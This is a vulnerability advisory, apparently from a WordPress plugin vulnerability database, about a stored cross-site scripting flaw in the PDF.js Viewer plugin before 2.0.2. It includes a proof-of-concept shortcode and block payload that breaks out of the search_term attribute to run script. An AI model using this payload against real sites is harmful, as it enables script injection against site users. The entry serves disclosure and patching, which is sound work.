WordPress Plugin Vulnerabilities
PDF.js Viewer < 2.0.2 - Contributor+ Stored Cross-Site Scripting
Description
The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks
Proof of Concept
[pdfjs-viewer search_term='" onload="alert(/XSS/)'] <!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} --> <div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div> <!-- /wp:pdfjsblock/pdfjs-embed -->
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-08 (about 2 years ago)
Added
2021-11-08 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)